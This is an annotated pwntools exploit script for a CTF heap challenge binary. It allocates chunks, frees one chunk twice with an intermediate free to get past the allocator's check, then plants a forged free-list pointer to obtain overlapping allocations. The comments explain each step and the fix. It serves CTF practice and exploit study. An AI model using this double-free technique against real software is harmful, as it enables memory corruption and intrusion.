#!/usr/bin/python
# Python 2 pwntools script (print statements, raw_input, str passed straight
# to sendline) that drives a menu-based heap binary, "./flea_attack.elf".
# Menu option "1" allocates a chunk (the script always asks for 50 bytes and
# then sends the chunk contents) and the binary echoes the chunk address after
# "Addr: "; option "2" frees a chunk given its address in hex.
#
# The exact order of sends and receives IS the behaviour here, so the file is
# annotated rather than restructured.  The sequence depends on the binary
# accepting a free of an address it already released (the author's own
# "FREEING ORIGINAL CHUNK AGAIN" step) -- from the binary's side, refusing or
# tracking already-freed addresses is the fix that removes that dependency.
import pwn
from pwn import *
# Local target; the remote endpoint on the next line is the original CTF
# service and was left commented out by the author.
p = pwn.process("./flea_attack.elf")
# p = pwn.remote("problem.harekaze.com",20175)
# Blocks until Enter so a debugger can be attached to the spawned process.
raw_input("<ATTACH NOW>")
# recv() with no argument consumes whatever output is currently pending, so
# these bare recv() calls are timing-dependent (recvuntil is the precise form).
p.recv()
# the size is 0x04.   (author's note; what "size" refers to is not visible here)
# First prompt: 94 'A' bytes plus p8(0x41), i.e. one more 'A' -- 95 bytes in
# total.  The author's trailing comment says this input does not matter.
p.sendline( ("A"*94 ) + p8(0x41)) # no-one cares
# --- allocation #1: 50 bytes containing "AAAA"; parse the printed address ---
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
buf = "AAAA"
p.sendline(buf)
p.recvuntil("Addr: ")
basechunk = int(p.recvuntil("\n").rstrip(),16)
# --- allocation #2: 50 bytes containing "lol"; parse its address as well ---
print " PUTTING IN NEW CHUNK OF 50 FOR DEBUG"
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
p.sendline("lol")
p.recvuntil("Addr: ")
basechunk2 = int(p.recvuntil("\n").rstrip(),16)
print " ADDRESS OF CHUNK1 AT: %x" % basechunk
print " ADDRESS OF CHUNK2 AT: %x" % basechunk2
# --- allocation #3: same shape, but its address is not parsed (the "Addr: "
# line is left in the stream and skipped by the recvuntil(">") below) ---
print "ALLOCATING ONE MORE FOR GOOD MEASURE..."
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
p.sendline("lol")
# Second manual pause for inspecting the heap in the attached debugger.
raw_input("<STOP1>")
p.recvuntil(">")
# --- free chunk #1 (option "2", address given in hex) ---
print " FREEING ORIGINAL CHUNK at %x" % basechunk
p.sendline("2")
p.recv()
p.sendline("%x" % (basechunk))
p.recvuntil(">")
# --- free chunk #2; the author's print says this intermediate free is what
# gets past a "security check" (presumably the allocator's, not the binary's
# -- confirm) before chunk #1 is freed a second time ---
print " FREEING SECOND CHUNK TO SKIP SECURITY CHECK at %x" % (basechunk2)
p.sendline("2")
p.recv()
p.sendline("%x" % (basechunk2))
p.recvuntil(">")
# p.interactive()
# --- free chunk #1 AGAIN: the binary accepts the repeated address, which is
# the defect this whole sequence depends on ---
print " FREEING ORIGINAL CHUNK AGAIN at %x" % basechunk
p.sendline("2")
p.recv()
p.sendline("%x" % (basechunk))
p.recvuntil(">")
# Third manual pause, after the repeated free.
raw_input("<STOP2>")
# --- allocation #4: contents are the 8-byte little-endian encoding of
# 0x204056 (the author's print labels this the chunk's "fd ptr"; where the
# value comes from is not shown in this script).  NOTE(review): unlike the
# earlier allocations there is no recv() between "1" and "50" here or in the
# next two allocations; both lines are queued and the binary is assumed to
# read them in order -- the prompt was already consumed by the recvuntil(">")
# above ---
print " SETUP: ALLOCATING FIRST CHUNK WITH NON-ZERO FD PTR"
p.sendline("1")
p.sendline("50")
buf = p64(0x204056)
p.sendline(buf)
p.recvuntil("Addr: ")
explsetup = int(p.recvuntil("\n").rstrip(),16)
# --- allocation #5: contents "bbbb"; its address is parsed but never used
# (the name says as much) ---
print " SETUP: ALLOCATING SECOND CHUNK (TO GET FIRST CHUNK BACK TO FREELIST HEAD)"
p.recvuntil(">")
p.sendline("1")
p.sendline("50")
p.sendline("bbbb")
p.recvuntil("Addr: ")
idgaf = int(p.recvuntil("\n").rstrip(),16)
# --- allocation #6: contents "cccc"; the two printed addresses below are
# compared by eye to see whether the same chunk was handed out twice ---
print " OK, REALLOCATING OVER FIRST CHUNK'S FD..."
p.recvuntil(">")
p.sendline("1")
p.sendline("50")
p.sendline("cccc")
p.recvuntil("Addr: ")
explchunk = int(p.recvuntil("\n").rstrip(),16)
p.recvuntil(">")
print " FIRST CHUNK REALLOCATE #1: %x" % explsetup
print " FIRST CHUNK REALLOCATE #2: %x" % explchunk
# reallocate 50, then add in "A"'s...   (author's note; the remaining steps
# were not scripted -- control is handed to the terminal instead)
p.interactive()